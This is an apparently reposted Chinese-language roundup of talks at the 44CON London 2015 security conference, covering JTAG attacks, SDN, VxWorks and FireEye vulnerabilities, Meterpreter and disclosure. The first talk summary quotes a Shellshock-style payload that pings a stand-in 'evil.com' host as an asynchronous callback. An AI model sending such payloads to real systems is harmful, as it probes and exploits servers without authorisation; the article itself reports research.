44CON伦敦:英国最大安全会议议题集合

44CON,现在称作44CON 伦敦,是英国最大的综合年度安全会议和培训活动,吸引了当地以及来自世界各地的最优秀,最活跃的信息安全行业的演讲者来到英国。

在2015年9月9日-11日举办的“44 CON 伦敦”峰会中,共有两轮议题,这里挑选了一些议题进行了简单介绍。

[[149070]]

第一轮

捕捉非同步漏洞

议题中,演讲者展示漏洞利用诱导回调会远远不止() { :;}; echo 1 > /dev/udp/evil.com/53来找盲注和异步XXE、(DOM)XSS、SQLi、SMTP以及单纯XML注入攻击。像是二阶SQL盲注以及通过cronijobs或者异步登录功能进行的shell命令注入,能够轻松进行渗透测试并获得成效。

JTAG利用:5根线,5种方法获取root shell

JTAG几乎与每个硬件相关的攻击都有关系。这个议题枚举了将jtag访问“check”(检测)变为根shell访问“checkmate”的不同方式。每个例子都将展示一个通过JTAG获取root权限的特殊方式。而每种方式又能不同程度地广泛应用于不同硬件体系结构并实现。演说中具体的代码和脚本将被公布。

软件定义网络的安全性(SDN)

SDN由研发到生产部署的快速发展,总是伴随着一些令人担忧的安全问题。此议题中概括了SDN技术的出现,它们暴露出的受攻击面以及一些在SDN控制器中被发现漏洞。最后我们将会着眼于目前提升SDN控制器安全性的努力。

窥探兵马俑科学的内部

虚拟专用网络(科学)十分受欢迎,大部分公司都有科学,让员工能够远程办公。而在一些特殊情况下,科学也被用于犯罪,因为它可以掩盖真实地址。FirstWatch公开了一家为与中国相关的多个科学品牌有合作的服务商,最后统计发现兵马俑科学节点生态系统包括了世界各地的1500多个节点。这些节点大多是由被攻击者入侵的Windows服务器搭建而成。

反逆向工程

演讲者Richo将带领与会者一起回顾一个传统AOT编译器以及运行时加载器的基本体系结构,并介绍了这些与现代字节代码VM(python、ruby等)操作之间的相似之处。有了这些新的发现,我们便可以编写一个工具去逆向分析一个被混淆的ruby脚本示例文件。然而,我们没有直接对字节代码进行分析,而是使用了全功能性的VM,来挖掘各种反分析技术的部署。

15分钟Linux事件响应实时分析

在15分钟内,研究者应该对于发生了的事情有个粗略的了解,即便出现“阵亡”,也要处于一个更利于分析的位置。Shell脚本展示了对系统的最小化干扰,并通过网络将所有信息发送给取证工作站。

与会人员并不需要具备超越基础Linux的知识,而演讲者将分享一些用于实时分析的工具,并为首次接触到shell脚本编程的人们进行一些清晰介绍。

铸造USB兵工厂

议题向我们展示了硬件开发之旅:USB兵工厂、开源硬件设计,以及在安全应用程序中添加一个闪存驱动器大小的电脑。

演讲者总结了从开源工具中汲取的的经验,制作外形小、规格高的嵌入式设备,以及如安全启动和ARM TrustZone执行的结构与安全性能。

C++逆向工程的介绍

议题概述了当前字体安全的前沿研究,回顾了80年代、90年代至今经历的排版与各种字体引擎之间关系的变迁,后面列举了潜在的攻击面,演讲者将讨论广泛专有OpenType/CFF实现的逆向工程过程,例如Windows kernel ATMFD.DLL模块(Adobe Type Manager Font Driver),并提供了对根本原因的深入分析和开发过程中发现的产品漏洞利用,其中包括微软、Adobe Reader、DirectWrite(Internet Explorer)、FreeType等安全漏洞。

其他议题

前往翡翠城: 基于AV的Ring-1

分析恶意的Office文档

动手操作JTAG获取root shell

第二轮

Windows 10:前进两步,后退一步

Windows 10为了成为最安全的操作系统加入了很多新功能,如控制流保护(CFG, Control Flow Guard)、凭证隔离(Credentials Isolation)。但是与此同时,很多新功能中存在的漏洞却又将系统的安全性降低了。这个议题介绍的就是这些新的安全功能中的漏洞,这些漏洞证明,要想在实践中真正做到安全还是很难的。

中间人攻击测试框架(MITMf):将中间人攻击带入21世纪

你是否已经厌倦了管理无数的脚本执行中间人攻击?

你是否厌倦了以不撞南墙不回头地决心去寻找Ettercap筛选器不工作的原因?

然而,中间人攻击测试框架集合了新旧中间人攻击技术于一个框架中。Python语言编写,有极强的可拓展性和可靠性,将带领中间人攻击迈入现在的21世纪。

VxWorks安全性分析:从石器时代到星际穿越

VxWorks是世界上使用最广泛的实时操作系统,部署在嵌入式系统中。VxWorks的市场遍布各种关键的领域,包括好奇号火星探测器、波音787梦幻客机等。在这些项目中的应用使得VxWorks的安全性成为了一个重要的问题。我们团队对VxWorks进行了充分的安全分析,包括它支持的网络协议和操作系统安全机制。我们会展示我们开发的,对VxWorks进行评估的工具,我们工具的目标就是通过在python中实现WdbRPC协议对VxWorks进行高效的渗透测试。届时我们还会展示几个漏洞。最后我们还会展示一个远程代码执行的漏洞,在互联网进行的快速扫描结果显示,至少10万台运行VxWorks的设备接入了互联网,因此这个漏洞的影响广泛。

玩把火: 攻击 FireEye MPS

这个议题会针对FireEye的恶意软件保护系统(MPS)最近爆出的大量漏洞进行回顾,其中还包括了一些正在修复的漏洞。这些漏洞包括对管理web界面的命令行注入漏洞、本地权限提升漏洞等。

演讲者将对这些问题的解决方案进行讨论。

如何让恶意软件分析师抓狂?

这个议题讨论的是恶意软件作者使用的不同恶意软件取证或者逆向工程的方式。演讲者针对反取证的历史以及现在那些方式正在被采用进行深入探讨。

了解Meterpreter的新亮点

Meterpreter在过去几年中发展迅猛,不断地迎接新的功能和更加稳定的特性。

这个议题将加深人们对于Materpreter的变化与成就的了解。不仅过去的特性在此所有提及,新的性能也得到了充分的讨论,而议题重点将放在如何利用这些新特点帮助建立“队伍”以及巩固他们的立足点。

负责任地披露(漏洞): 有人在乎吗?

Oj和Dan均从事安全评估工作很多年了。他们讲设备中发现的重大漏洞报道给供应商后,有时供应商会表示关注并在随后采取行动,然而更多的情况是,供应商假装努力解决问题,实则完全忽略了研究员,有的甚至公开说“走开”。演讲者将“负责任地披露漏洞”所面临的挑战一一指出,而这些公司也陷入了是否应该帮自己的解决问题困境。

其他议题

是否有EFI怪兽在你的苹果里面?

智能电表平台的故事与工具集

网关野蛮人:对于攻击者工具箱的考验

Pwn2Own 案例研究——Windows 8.1 64位IE的漏洞利用

到疯狂的火车铁轨上去——AUTH

老狗,新花样——使用PowerShell进行取证分析

福利

44CON London 2015-PPT:http://www.slideshare.net/44Con

文章来源网络,作者:运维,如若转载,请注明出处:https://shuyeidc.com/wp/128950.html<

(0)
运维的头像运维
上一篇2025-02-25 09:29
下一篇 2025-02-25 09:31

相关推荐

  • 个人主题怎么制作?

    制作个人主题是一个将个人风格、兴趣或专业领域转化为视觉化或结构化内容的过程,无论是用于个人博客、作品集、社交媒体账号还是品牌形象,核心都是围绕“个人特色”展开,以下从定位、内容规划、视觉设计、技术实现四个维度,详细拆解制作个人主题的完整流程,明确主题定位:找到个人特色的核心主题定位是所有工作的起点,需要先回答……

    2025-11-20
    0
  • 社群营销管理关键是什么?

    社群营销的核心在于通过建立有温度、有价值、有归属感的社群,实现用户留存、转化和品牌传播,其管理需贯穿“目标定位-内容运营-用户互动-数据驱动-风险控制”全流程,以下从五个维度展开详细说明:明确社群定位与目标社群管理的首要任务是精准定位,需明确社群的核心价值(如行业交流、产品使用指导、兴趣分享等)、目标用户画像……

    2025-11-20
    0
  • 香港公司网站备案需要什么材料?

    香港公司进行网站备案是一个涉及多部门协调、流程相对严谨的过程,尤其需兼顾中国内地与香港两地的监管要求,由于香港公司注册地与中国内地不同,其网站若主要服务内地用户或使用内地服务器,需根据服务器位置、网站内容性质等,选择对应的备案路径(如工信部ICP备案或公安备案),以下从备案主体资格、流程步骤、材料准备、注意事项……

    2025-11-20
    0
  • 如何企业上云推广

    企业上云已成为数字化转型的核心战略,但推广过程中需结合行业特性、企业痛点与市场需求,构建系统性、多维度的推广体系,以下从市场定位、策略设计、执行落地及效果优化四个维度,详细拆解企业上云推广的实践路径,精准定位:明确目标企业与核心价值企业上云并非“一刀切”的方案,需先锁定目标客户群体,提炼差异化价值主张,客户分层……

    2025-11-20
    0
  • PS设计搜索框的实用技巧有哪些?

    在PS中设计一个美观且功能性的搜索框需要结合创意构思、视觉设计和用户体验考量,以下从设计思路、制作步骤、细节优化及交互预览等方面详细说明,帮助打造符合需求的搜索框,设计前的规划明确使用场景:根据网站或APP的整体风格确定搜索框的调性,例如极简风适合细线条和纯色,科技感适合渐变和发光效果,电商类则可能需要突出搜索……

    2025-11-20
    0

发表回复

您的邮箱地址不会被公开。必填项已用 * 标注